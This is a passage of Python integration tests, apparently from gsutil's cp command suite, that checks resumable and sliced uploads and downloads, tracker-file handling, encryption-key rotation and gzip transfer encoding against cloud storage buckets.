def test_cp_resumable_upload_break_file_content_change(self):
"""Tests a resumable upload where the uploaded file changes content."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'XML doesn\'t make separate HTTP calls at fixed-size boundaries for '
'resumable uploads, so we can\'t guarantee that the server saves a '
'specific part of the upload.')
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * ONE_KIB)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 512)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'b' * ONE_KIB * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_smaller_size(self):
"""Tests a resumable upload where the uploaded file changes content.
This should fail hash validation.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * ONE_KIB)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 512)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_resume(self):
"""Tests that an encrypted composite upload resumes successfully."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
file_name = 'foobar'
source_file = self.CreateTempFile(contents=file_contents,
file_name=file_name)
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file
# that points to a previously uploaded component.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
# Create component 0 to be used in the resume; it must match the name
# that will be generated in copy_helper, so we use the same scheme.
encoded_name = (PARALLEL_UPLOAD_STATIC_SALT + source_file).encode(UTF8)
content_md5 = GetMd5()
content_md5.update(encoded_name)
digest = content_md5.hexdigest()
component_object_name = (tracker_prefix + PARALLEL_UPLOAD_TEMP_NAMESPACE +
digest + '_0')
component_size = 3
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=component_object_name,
contents=file_contents[:component_size],
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(component_object_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name,
tracker_prefix,
existing_components,
encryption_key_sha256=enc_key_sha256)
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size',
str(component_size)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn('Found 1 existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_restart(self):
"""Tests that encrypted composite upload restarts given a different key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
source_file = self.CreateTempFile(contents=file_contents, file_name='foo')
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
existing_component_name = 'foo_1'
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo_1',
contents=b'foo',
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(existing_component_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name, tracker_prefix,
existing_components,
enc_key_sha256.decode('ascii'))
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '3'),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn(
'does not match current encryption key. '
'Deleting old components and restarting upload', stderr)
self.assertNotIn('existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_composite_upload(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_suri = suri(bucket_uri, 'composed')
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([
('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '1')
]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
# This temporarily changes the tracker directory to unwritable which
# interferes with any parallel running tests that use the tracker directory.
@NotParallelizable
@SkipForS3('No resumable upload support for S3.')
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file(self):
"""Tests a resumable upload with an unwritable tracker file."""
bucket_uri = self.CreateBucket()
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
# This temporarily changes the tracker directory to unwritable which
# interferes with any parallel running tests that use the tracker directory.
@NotParallelizable
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file_download(self):
"""Tests downloads with an unwritable tracker file."""
object_uri = self.CreateObject(contents=b'foo' * ONE_KIB)
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(object_uri)), TrackerFileType.DOWNLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile()
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(EIGHT_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
# Should succeed because we are below the threshold.
self.RunGsUtil(['cp', suri(object_uri), fpath])
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def _test_cp_resumable_download_break_helper(self,
boto_config,
encryption_key=None):
"""Helper function for different modes of resumable download break.
Args:
boto_config: List of boto configuration tuples for use with
SetBotoConfigForTest.
encryption_key: Base64 encryption key for object encryption (if any).
"""
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=encryption_key)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest(boto_config):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_break(self):
"""Tests that a download can be resumed after a connection break."""
self._test_cp_resumable_download_break_helper([
('GSUtil', 'resumable_threshold', str(ONE_KIB))
])
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_break(self):
"""Tests that an encrypted download resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
self._test_cp_resumable_download_break_helper(
[('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)],
encryption_key=TEST_ENCRYPTION_KEY1)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_key_rotation(self):
"""Tests that a download restarts with a rotated encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
# After simulated connection break, rotate the key on the object.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY1),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['rewrite', '-k', suri(object_uri)])
# Now resume the download using only the new encryption key. Since its
# generation changed, we must restart it.
boto_config_for_test3 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test3):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Restarting download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
@SequentialAndParallelTransfer
def test_cp_resumable_download_etag_differs(self):
"""Tests that download restarts the file when the source object changes.
This causes the etag not to match.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
# This will create a tracker file with an ETag.
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
# Create a new object with different contents - it should have a
# different ETag since the content has changed.
object_uri = self.CreateObject(
bucket_uri=bucket_uri,
object_name='foo',
contents=b'b' * self.halt_size,
gs_idempotent_generation=object_uri.generation)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# TODO: Enable this test for sequential downloads when their tracker files are
# modified to contain the source object generation.
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_resumable_download_generation_differs(self):
"""Tests that a resumable download restarts if the generation differs."""
bucket_uri = self.CreateBucket()
file_contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
# Overwrite the object with an identical object, increasing
# the generation but leaving other metadata the same.
identical_file = self.CreateTempFile(contents=file_contents)
self.RunGsUtil(['cp', suri(identical_file), suri(object_uri)])
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertIn('Restarting download from scratch', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_file_larger(self):
"""Tests download deletes the tracker file when existing file is larger."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
with open(fpath + '_.gstmp', 'w') as larger_file:
for _ in range(self.halt_size * 2):
larger_file.write('a')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
self.assertIn('Deleting tracker file', stderr)
def test_cp_resumable_download_content_differs(self):
"""Tests that we do not re-download when tracker file matches existing file.
We only compare size, not contents, so re-download should not occur even
though the contents are technically different. However, hash validation on
the file should still occur and we will delete the file then because
the hashes differ.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'w') as fp:
fp.write('abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
try:
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Download already complete', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
# File and tracker file should be deleted.
self.assertFalse(os.path.isfile(temp_download_file))
self.assertFalse(os.path.isfile(tracker_filename))
# Permanent file should not have been created.
self.assertFalse(os.path.isfile(fpath))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_content_matches(self):
"""Tests download no-ops when tracker file matches existing file."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
matching_contents = b'abcd' * ONE_KIB
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'wb') as fp:
fp.write(matching_contents)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=matching_contents)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Download already complete', stderr)
# Tracker file should be removed after successful hash validation.
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_tracker_file_not_matches(self):
"""Tests that download overwrites when tracker file etag does not match."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir, contents=b'abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match regex for exactly one object ETag')
etag = etag_match.group(1)
etag += 'nonmatching'
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Ensure the file was overwritten.
with open(fpath, 'r') as in_fp:
contents = in_fp.read()
self.assertEqual(
contents, 'efgh' * ONE_KIB,
'File not overwritten when it should have been '
'due to a non-matching tracker file.')
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_double_gzip(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
self.RunGsUtil([
'-h', 'content-type:application/gzip', 'cp', '-Z',
suri(fpath),
suri(bucket_uri, 'foo')
])
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_double_gzip_transport_encoded(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
stderr = self.RunGsUtil([
'-D', '-h', 'content-type:application/gzip', 'cp', '-J',
suri(fpath),
suri(bucket_uri, 'foo')
],
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SequentialAndParallelTransfer
def test_cp_resumable_download_gzip(self):
"""Tests that download can be resumed successfully with a gzipped file."""
# Generate some reasonably incompressible data. This compresses to a bit
# around 128K in practice, but we assert specifically below that it is
# larger than self.halt_size to guarantee that we can halt the download
# partway through.
object_uri = self.CreateObject()
random.seed(0)
contents = str([
random.choice(string.ascii_letters) for _ in xrange(self.halt_size)
]).encode('ascii')
random.seed() # Reset the seed for any other tests.
fpath1 = self.CreateTempFile(file_name='unzipped.txt', contents=contents)
self.RunGsUtil(['cp', '-z', 'txt', suri(fpath1), suri(object_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _GetObjectSize():
stdout = self.RunGsUtil(['du', suri(object_uri)], return_stdout=True)
size_match = re.search(r'(\d+)\s+.*', stdout)
self.assertIsNotNone(size_match, 'Could not get object size')
self.assertEqual(len(size_match.groups()), 1,
'Did not match regex for exactly one object size.')
return long(size_match.group(1))
object_size = _GetObjectSize()
self.assertGreaterEqual(
object_size, self.halt_size,
'Compresed object size was not large enough to '
'allow for a halted download, so the test results '
'would be invalid. Please increase the compressed '
'object size in the test.')
fpath2 = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath2)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
self.assertIn('Downloading to temp gzip filename', stderr)
# Tracker files will have different names depending on if we are
# downloading sequentially or in parallel.
sliced_download_threshold = HumanReadableToBytes(
boto.config.get('GSUtil', 'sliced_object_download_threshold',
DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD))
sliced_download = (len(contents) > sliced_download_threshold and
sliced_download_threshold > 0 and
UsingCrcmodExtension())
if sliced_download:
trackerfile_type = TrackerFileType.SLICED_DOWNLOAD
else:
trackerfile_type = TrackerFileType.DOWNLOAD
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath2),
trackerfile_type, self.test_api)
# We should have a temporary gzipped file, a tracker file, and no
# final file yet.
self.assertTrue(os.path.isfile(tracker_filename))
self.assertTrue(os.path.isfile('%s_.gztmp' % fpath2))
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath2)], return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
self.assertFalse(os.path.isfile(tracker_filename))
self.assertFalse(os.path.isfile('%s_.gztmp' % fpath2))
def _GetFaviconFile(self):
# Make a temp file from favicon.ico.gz. Finding the location of our test
# data varies depending on how/where gsutil was installed, so we get the
# data via pkgutil and use this workaround.
if not hasattr(self, 'test_data_favicon_file'):
contents = pkgutil.get_data('gslib', 'tests/test_data/favicon.ico.gz')
self.test_data_favicon_file = self.CreateTempFile(contents=contents)
return self.test_data_favicon_file
def test_cp_download_transfer_encoded(self):
"""Tests chunked transfer encoded download handling.
Tests that download works correctly with a gzipped chunked transfer-encoded
object (which therefore lacks Content-Length) of a size that gets fetched
in a single chunk (exercising downloading of objects lacking a length
response header).
"""
# Upload a file / content-encoding / content-type that triggers this flow.
# Note: We need to use the file with pre-zipped format and manually set the
# content-encoding and content-type because the Python gzip module (used by
# gsutil cp -Z) won't reproduce the bytes that trigger this problem.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, object_name='foo')
input_filename = self._GetFaviconFile()
self.RunGsUtil([
'-h', 'Content-Encoding:gzip', '-h', 'Content-Type:image/x-icon', 'cp',
suri(input_filename),
suri(object_uri)
])
# Compute the MD5 of the uncompressed bytes.
with gzip.open(input_filename) as fp:
hash_dict = {'md5': GetMd5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
in_file_md5 = hash_dict['md5'].digest()
# Downloading this file triggers the flow.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
# Compute MD5 of the downloaded (uncompressed) file, and validate it.
with open(fpath2, 'rb') as fp:
hash_dict = {'md5': GetMd5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
out_file_md5 = hash_dict['md5'].digest()
self.assertEqual(in_file_md5, out_file_md5)
@SequentialAndParallelTransfer
def test_cp_resumable_download_check_hashes_never(self):
"""Tests that resumble downloads work with check_hashes = never."""
bucket_uri = self.CreateBucket()
contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'check_hashes', 'never')]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Found no hashes to validate object downloaded', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_bucket_deleted(self):
"""Tests that a not found exception is raised if bucket no longer exists."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * 2 * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_DeleteBucketThenStartOverCopyCallbackHandler(5, bucket_uri)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True,
expected_status=1)
self.assertIn('Deleting bucket', stderr)
self.assertIn('bucket does not exist', stderr)
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download(self):
"""Tests that sliced object download works in the general case."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * ONE_KIB)
fpath = self.CreateTempFile()
# Force fast crcmod to return True to test the basic sliced download
# scenario, ensuring that if the user installs crcmod, it will work.
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'test_assume_fast_crcmod', 'True'),
('GSUtil', 'sliced_object_download_threshold', str(ONE_KIB)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), fpath])
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * ONE_KIB, 'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_unresumable_sliced_download(self):
"""Tests sliced download works when resumability is disabled."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
